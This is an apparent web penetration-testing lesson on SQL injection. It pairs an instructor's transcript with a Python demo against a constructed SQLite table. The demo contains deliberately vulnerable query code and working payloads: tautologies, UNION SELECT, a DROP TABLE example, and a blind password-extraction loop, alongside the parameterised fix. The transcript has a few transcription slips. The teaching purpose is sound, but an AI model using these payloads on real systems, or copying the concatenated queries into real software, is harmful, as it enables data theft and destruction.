Part 1 - What is SQL Injection


Time
4 hours 20 minutes
Difficulty
Intermediate
Video Description

This lesson covers SQL injection. In this lesson, participants learn about: 1. What is a SQL injection? 2. How it works 3. Types 4. Examples. A SQL injection is a form of attack which takes advantage of improperly filtered user input, using that input to enumerate and manipulate a database. This lesson discusses two types of SQL injection, classic and blind. The instructor also offers examples of where to inject.
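The definition above, and the classic-versus-blind distinction the lesson draws, can be seen in a few lines of code. What follows is an added example written for this page; it is not code from the lesson or from Cybrary. It builds a constructed SQLite users table (the accounts and passwords are made up), shows a lookup built by string concatenation falling to the one-equals-one and banana-equals-banana style tautologies and to a UNION SELECT, shows the same lookup with a bound parameter resisting them, and then recovers a password through a login check that only answers yes or no, which is the boolean-based form of blind SQL injection the lesson alludes to when it says the attacker gets no data back directly. All function names are my own.

```python
import sqlite3
import string

# Constructed sample accounts; nothing here comes from the lesson.
SAMPLE_USERS = [
    ("alice", "s3cret", 1),
    ("bob", "hunter2", 0),
    ("frank", "qwerty", 0),
]


def make_db():
    """Build an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    return conn


def vulnerable_lookup(conn, username):
    """Classic SQLi: the form-field value is concatenated into the query, so a
    quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, username):
    """Hardened form: a bound parameter is sent as data and never parsed as SQL,
    so quotes, OR clauses and UNIONs in the input are just characters."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def vulnerable_login(conn, username, password):
    """Blind oracle: returns only True/False, never row contents, but is still
    built by string concatenation, so it is injectable."""
    sql = (
        "SELECT count(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def blind_extract_password(conn, target_user,
                           charset=string.ascii_lowercase + string.digits,
                           max_len=32):
    """Boolean-based blind SQLi: recover a password one character at a time by
    asking yes/no questions through the login oracle.  Stops at the first
    position where no character in `charset` matches."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # substr() is 1-indexed in SQLite; '-- ' comments out the original
            # "AND password = '...'" tail so only our condition is evaluated.
            payload = f"{target_user}' AND substr(password,{pos},1)='{ch}'-- "
            if vulnerable_login(conn, payload, "x"):
                recovered += ch
                break
        else:
            break  # no character matched: end of the password
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("tautology:", vulnerable_lookup(db, "' OR '1'='1"))
    print("banana:   ", vulnerable_lookup(db, "' OR 'banana'='banana"))
    print("union:    ", vulnerable_lookup(db, "x' UNION SELECT id, password FROM users-- "))
    print("bound:    ", safe_lookup(db, "' OR '1'='1"))
    print("blind:    ", blind_extract_password(db, "alice"))
```

The parameterised lookup is the fix: filtering the literal string 1=1 does nothing against banana=banana or a UNION, whereas a bound parameter makes the whole input a value. The blind loop is why an application that shows no error and returns no rows is still not safe; a single true/false signal is enough to read the table out, just more slowly.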

Video Transcription
Welcome to Cybrary. I am Raymond Evans and I will be your subject matter expert for Cybrary's Web App Penetration Testing course. In this video, we will be discussing SQL injection.

So what will be covered? What SQL injection is, how it works, some types, and some examples.

So what is a SQL inject? Well, a SQL inject is a code injection attack which takes advantage of improperly filtered user input to enumerate and manipulate a database. What exactly does that mean? Well, an attacker can use a statement to send commands to a SQL database and get information back from it. An attacker can also use this statement to manipulate data on the database as well, such as doing things like dumping an entire database.

Two types of SQL injections we will be covering are classic SQL injections, or SQLi, and blind SQL injections, or blind SQLi. I'm going to be interchanging SQL injection and SQLi throughout this course because that's how you will see it in the real world. You'll see both of those terms used.

What's a classic SQL injection? Well, this type of injection occurs when escape characters are improperly filtered. An escape character is something like a single or double quote, and these are used to denote the end of something and then the beginning of a series of commands. A SQL injection command is then sent to the SQL application. Those results are immediately displayed to the attacker. Classic SQL injections utilize WHERE clause modification and UNION operator injections to exploit the improper filtering. The WHERE and UNION modifications you will be seeing later on; I will be explaining them further.

Blind SQL injection is a form of SQL injection that does the same exact thing as normal SQL injection, except the attacker isn't able to immediately see the results. For a web application that needs to suffer blind SQL injection, it's best to use an automated tool, such as one of the tools like Tableau, or if you want, you can also craft a statement with a SQL inject to do something like create a user account or add some kind of data to the database. If this works, then you know that it's vulnerable to a blind SQL inject. The individual can't perform a SQL inject and get data immediately back. However, they can perform a blind SQL inject to do something like dump the database or add a user account for themselves to gain access.

Where would you exactly inject, though? SQL injections can be placed in various portions of a web page and in the source code of the page itself as well. However, the two most common areas you will find them are in the URL and in form fields. Here we see a couple of examples of those attacks in those different fields. The URL here, we see in the first one, uses a single escape character to try to discover if a SQL injection is possible. Same thing with the second one: it is using escape characters to try to get a SQL error back. The third one here actually uses a one-equals-one statement. This would be used to try to get data. Same thing within the form field here. You are telling it that you're looking for anything, any username that has one or any username that is true. It'll dump out all the usernames because, hey, all the usernames are true, in fact.

So why exactly is this dangerous? Well, if a website is vulnerable to SQL injection, the site may disclose a lot of sensitive information: stuff like credit card data, Social Security numbers, addresses, usernames, and passwords. This data can be used to steal identities and money, or it can be used to convict them over a long period of time. In the case of usernames and passwords, this can be used to get admin credentials and elevate their privileges on the system as well. So that's another reason why it's really, really dangerous: because of privilege escalation. If something like this goes unchecked for years and years, an attacker can just sit back and siphon off data and just steal credit cards and Social Security numbers for many, many years, if it's left unchecked and if there's nothing set up like an IDS or IPS to identify these types of attacks.

Here's a couple of examples of SQL injections. In our first one here, we see that one-equals-one statement again. This query is recognized as true and will dump the database onto the screen. This is one of the most common examples that you will see, and it's amazing how much this works. Now, you can trick a system even if it's filtering the classic one equals one, because as long as any variables are in there whatsoever, it will do this, so you could do Tim OR Bob equals Bob. As long as that statement, and the second portion, is equal and correct, it will dump the database for you. So that's something to watch out for if you say, "Oh, hey, it's cool. We got the classic one equals one filtered." Well, do you have banana equals banana or dog equals dog? I don't think so.

Next, we have an example which is asking to display every column from every table where the ID equals one, which would display the entire database. This type of statement can be used to refine your search even further. Here we see SELECT star FROM star WHERE id equals one. Now, those stars there can be used to refine your searches, so that star represents a variable for everything. You're saying select everything from everything where ID equals one. You could say something like select usernames, or users if you know the table is called users, from customer where ID equals Frank, and you would get a list of users by the name Frank from that database.

Next, we see an example of how to modify something on the table. What we're doing is saying select everything from everything where ID equals one. Then it says DROP TABLE everything. If your database was vulnerable to SQL injections and somebody was to put this in there, it could and would drop your tables, which is really bad because it would be deleting your database.

Our final example here, the statement below, uses a SQL post injection to refine the attack even more. So it's showing, like above, select a variable from a variable where type ID equals one. Then it uses a UNION SELECT, UNION ALL SELECT statement to define it even further. This type of SQL injection would most likely be used with a program such as sqlmap, which we will be showing later on, and I will be demonstrating later on how to create a more refined search with this string here. Right now it seems like a lot of garbage to you, but once we actually practice it and show how it's used, it'll make a lot more sense.

Where are some real-world examples of SQL injection being used and impacting people? Well, in 2008, the sexual and violent offenders registry of Oklahoma had 10,597 Social Security numbers belonging to sex offenders stolen via SQL inject. In 2002, guess.com was vulnerable to a SQL injection attack permitting anybody who could construct a properly-crafted URL to pull down towards 1,000-plus names, credit card numbers, and expiration dates in the site's customer database. Then in 2011, LulzSec was accused of using SQL injection to steal coupons, download keys, and passwords that were stored in plain text on Sony's website. The guess.com vulnerability, the SQL injection vulnerability that was there, was one of the one-equals-one statements that you had seen in the URL itself. That's one example of where that was used. As for the 2011 LulzSec attack: you never store anything that's sensitive in plain text, ever, anywhere.

What was covered? Well, I talked about what a SQL inject is, showed a couple of examples, talked about how it works, talked about some types of SQL injections, and then gave you some real-world examples. Happy hacking, everyone.